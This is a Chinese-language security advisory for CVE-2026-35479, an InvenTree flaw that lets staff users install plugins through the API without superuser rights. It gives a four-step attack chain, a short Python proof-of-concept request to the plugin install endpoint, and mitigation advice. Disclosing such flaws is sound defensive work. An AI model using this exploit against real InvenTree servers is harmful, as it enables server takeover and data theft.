CVE-2026-35479 CVSS 6.6 中危

CVE-2026-35479 InvenTree权限提升漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35479

漏洞类型

权限提升

CVSS评分

6.6 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

InvenTree

漏洞概述

InvenTree是一个开源库存管理系统。在1.2.7和1.3.0版本之前，拥有员工权限（非超级用户）的用户可以通过API安装插件。这与卸载插件等需要超级用户权限的其他操作不一致。该漏洞允许受信任度较低的员工用户安装任意或恶意插件，从而可能危及系统安全。

技术细节

该漏洞源于InvenTree的插件管理逻辑中的访问控制缺陷。系统在处理插件安装的API请求时，错误地仅校验了用户是否具备'员工'（staff）状态，而未严格校验是否为'超级用户'（superuser）。由于插件通常具有执行代码的权限，这种权限检查的缺失使得非管理员员工能够上传并安装包含恶意代码的插件包（如Python包）。攻击者利用此漏洞，只需拥有员工账户即可通过API端点执行插件安装操作，进而可能在服务器上执行任意代码，导致系统完整性、机密性和可用性受损。CVSS向量中的S:C表明利用此漏洞可能影响超出当前安全范围的其他资源。

攻击链分析

STEP 1

1. 信息收集

攻击者确认目标使用InvenTree系统，并获取一个具有员工权限的有效账户凭据。

STEP 2

2. 构造载荷

攻击者准备一个恶意的插件包，其中包含后门代码或任意代码执行脚本。

STEP 3

3. 漏洞利用

攻击者使用员工凭据调用InvenTree的插件安装API，上传并安装恶意插件。

STEP 4

4. 执行与控制

插件安装后自动加载或被触发，执行恶意代码，从而获取服务器权限或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Configuration
target_url = "http://your-inventree-instance.com"
api_token = "YOUR_STAFF_USER_API_TOKEN" # Requires staff permission
plugin_file_path = "malicious_plugin.tar.gz"

# The vulnerable API endpoint for plugin installation
endpoint = f"{target_url}/api/plugin/install/"

headers = {
    "Authorization": f"Token {api_token}"
}

try:
    with open(plugin_file_path, 'rb') as f:
        files = {'file': f}
        # Send POST request to install the plugin
        response = requests.post(endpoint, headers=headers, files=files)

    if response.status_code == 201:
        print("[+] Exploit successful: Plugin installed.")
    else:
        print(f"[-] Exploit failed: {response.status_code} - {response.text}")

except Exception as e:
    print(f"[!] Error: {e}")

影响范围

InvenTree < 1.2.7

InvenTree < 1.3.0

防御指南

临时缓解措施

如果无法立即升级，建议管理员通过防火墙或Web服务器配置限制对/plugin/install/等API端点的访问，仅允许特定IP或超级用户访问。同时，应加强账户安全策略，确保员工账户不被泄露，并密切监控系统日志以检测异常的插件安装行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表